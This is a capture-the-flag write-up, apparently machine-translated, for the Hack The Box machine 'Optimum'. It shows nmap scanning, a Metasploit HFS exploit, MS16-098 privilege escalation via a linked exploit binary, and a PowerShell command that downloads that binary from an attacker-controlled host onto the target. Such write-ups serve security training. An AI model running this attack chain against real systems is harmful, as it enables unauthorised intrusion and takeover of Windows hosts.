当前位置:网站首页>Hack the box optimum
Hack the box optimum
2022-04-23 02:29:00 【zr1213159840】
First open the range , direct nmap Open a sweep .
nmap -sV -Pn -A 10.10.10.8
Through the scanning results, it is known that 80 port ,80 The port ran away HFS service . Go with the trend msf Search for HFS What are the loopholes
search hfs
Use the following hfs The order of , Then look at what to configure
use 1
options
The remote host needs to be configured , Local host , Good configuration ,run. many run A few times , The first few times are easy to fail , It will take a long time .
set RHOSTS 10.10.10.8
set LHOSTS 10.10.14.17
run
After successful use , return meterpreter. Then look at the files in the current folder . Can see user Of flag
It can be read directly user.txt.txt Or enter shell, Read user.txt.txt
# Direct reading
cat user.txt.txt
Then keep looking , See if you can enter administrator Folder , Find that you can't , And you can't create new users .
Want to use it directly msf The right to raise , But you don't get permission after execution . So how should we raise the right ? See what patches have been made .systeminfo It can still be implemented .
After getting this information , Use Windows-Exploit-Suggester Script comparison , Look at the breakthrough point .( I can't even run this script in this place , say xlrd Report errors , This script uses python2 Written , Attention, everyone .)
The address is https://git Hab .com/AonCyberLabs/Windows-Exploit-Suggester. See how to use readme Just go . Remember it was python2 And install xlrd.
Will be far away systeminfo Copy the information , Then use the following command to compare
python2 windows-exploit-suggester.py --database 2021-04-21-mssb.xls --systeminfo sysinfo.txt
The comparison results show that MS16–098 Raise the right . You can use this link to get the right to raise exe.
https://git Hab .com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
After downloading , stay exe Start a local... Folder http The server
python3 -m http.server 888
Then at the end of the target plane shell Execute the following command in
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17:888/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
This command means to download 10.10.14.17 above 41020.exe, Then put it under the back position .
Find... In the corresponding position , And then execute 41020.exe, Get the highest authority smoothly
Go to the users/administrator/desktop Now get root.txt, Get it done .
Postscript : Find out what's ahead users.txt It's not hard to , However, in the later process of raising rights, it involves python2 Environment and so on , so much trouble . especially Windows-Exploit-Suggester Script execution was unsuccessful , I made a direct reference to other people's content , You can try it yourself . special kali It doesn't seem to bring pip2, You can refer to the following links .
Reference link
https://ranakhalil101.medium.com/hack-the-box-optimum-writeup-w-o-metasploit-3a912e1c488c
pip2 The installation link can refer to :
https://www.cnblogs.com/lzkalislw/p/15579620.html
版权声明
本文为[zr1213159840]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204230226467825.html
边栏推荐
- Multithreading technology core
- 想体验HomeKit智能家居?不如来看看这款智能生态
- 【Chrome扩展程序】content_script的跨域问题
- PTA: 浪漫倒影 [二叉树重建] [深度优先遍历]
- SQL server2019无法下载所需文件,这可能表示安装程序的版本不再受支持,怎么办了
- New book recommendation - IPv6 technology and application (Ruijie version)
- They are all intelligent in the whole house. What's the difference between aqara and homekit?
- hyperscan --- 1
- 011_RedisTemplate操作Hash
- Class initialization and instance initialization interview questions
猜你喜欢
双亲委派模型【理解】
[assembly language] understand "stack" from the lowest point of view
[XJTU计算机网络安全与管理]第二讲 密码技术
Unicorn bio raised $3.2 million to turn prototype equipment used to grow meat into commercial products
MySQL JDBC编程
006_ redis_ Sortedset type
PTA: 点赞狂魔
电源电路设计原来是这么回事
[XJTU計算機網絡安全與管理]第二講 密碼技術
【2019-CVPR-3D人体姿态估计】Fast and Robust Multi-Person 3D Pose Estimation from Multiple Views
随机推荐
认识进程(多线程_初阶)
WordPress calls the specified page content. 2 get_ children()
Flink real-time data warehouse project - Design and implementation of DWS layer
Halo open source project learning (I): project launch
Leetcode39 combined sum
001_redis设置存活时间
Wechat public platform test number application, authorized login function and single sign on using hbuilder X and wechat developer tools
Usage of vector common interface
ThinkPHP kernel development blind box mall source code v2 0 docking easy payment / Alibaba cloud SMS / qiniu cloud storage
程序设计天梯赛 L1-49 天梯赛分配座位(模拟),布响丸辣
Execute external SQL script in MySQL workbench and report error
arduino esp8266 网络升级 OTA
PTA: Romantic reflection [binary tree reconstruction] [depth first traversal]
想体验HomeKit智能家居?不如来看看这款智能生态
1、 Sequence model
Startup of openstack service
R language advanced | generalized vector and attribute analysis
MySQL C language connection
JSP page nesting
Gray scale range corresponding to colors (red, yellow, green, blue, purple, pink, brick red and magenta) in HSV color space